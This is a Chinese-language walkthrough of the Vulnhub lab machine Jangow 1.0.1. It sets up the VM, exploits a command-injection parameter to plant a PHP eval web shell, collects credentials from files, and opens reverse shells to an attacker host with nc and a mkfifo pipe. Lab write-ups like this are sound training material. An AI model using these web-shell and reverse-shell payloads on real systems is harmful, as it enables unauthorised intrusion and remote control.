Vulnhub靶机:JANGOW_ 1.0.1

目录

前言:

一、安装虚拟机Jangow:1.0.1靶机

二、Web部分


前言:

难度:简单,本文使用VirtualBox打开,下载地址:

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

一、安装虚拟机Jangow:1.0.1靶机

1.选择下载的Jangow: 1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住的路径用完直接删。

  1. 靶机和kali的网络都设置成仅主机模式
  1. 显存改到128或256都可以。

4.打开虚拟机

二、Web部分

1.打开虚拟机后看到IP为192.168.56.118,直接浏览器访问。

  1. 点击site跳转到一个网站
  1. 用kali扫描下目录,同时前端页面点点点,看下功能。

4.发现wordpress地址,但未发现后台登录地址,没用,但是前端我们随便点点的时候发现一个可以传参的接口,并且可利用。

5.直接一句话上传,用蚁剑连接。

?buscar=echo '<?php @eval($_POST['cmd']);?> ' > 666.php

6.先翻翻看,发现了wordpress的账号密码,先记录下备用。

7.在HTML下发现了.backup文件,里面包含了账号密码,记录备用。

8.尝试登录frp,使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的jangow01/abygurl69,可以登陆,翻看下没有什么有用的信息。

  1. 常规反弹shell失败,可能是nc 不支持 -e 参数,这个时候可以有两种解决方式:

第一种是使用其他的nc版本如下所示:

nc.traditional <your_vps> 1024 -e /bin/sh

  1. 第二种就是使用 mkfifo 命令创建命名管道反弹shell:

mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f

  1. 本文使用第二种,然后访问浏览器触发式反弹shell,先使用蚁剑在/var/www/html/site/下面新建78.php文件,然后输入下方内容,注意ip换成自己ip的,另外该靶机只能用443端口。

    <?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f");?>
相关推荐
newxtc1 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
follycat6 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
Lionhacker20 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos081 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予1 天前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全
蜗牛学苑_武汉1 天前
Wazuh入侵检测系统的安装和基本使用
网络·网络安全
乐茵安全1 天前
linux基础
linux·运维·服务器·网络·安全·网络安全
如光照1 天前
Linux与Windows中的流量抓取工具:wireshark与tcpdump
linux·windows·测试工具·网络安全
follycat1 天前
2024强网杯Proxy
网络·学习·网络安全·go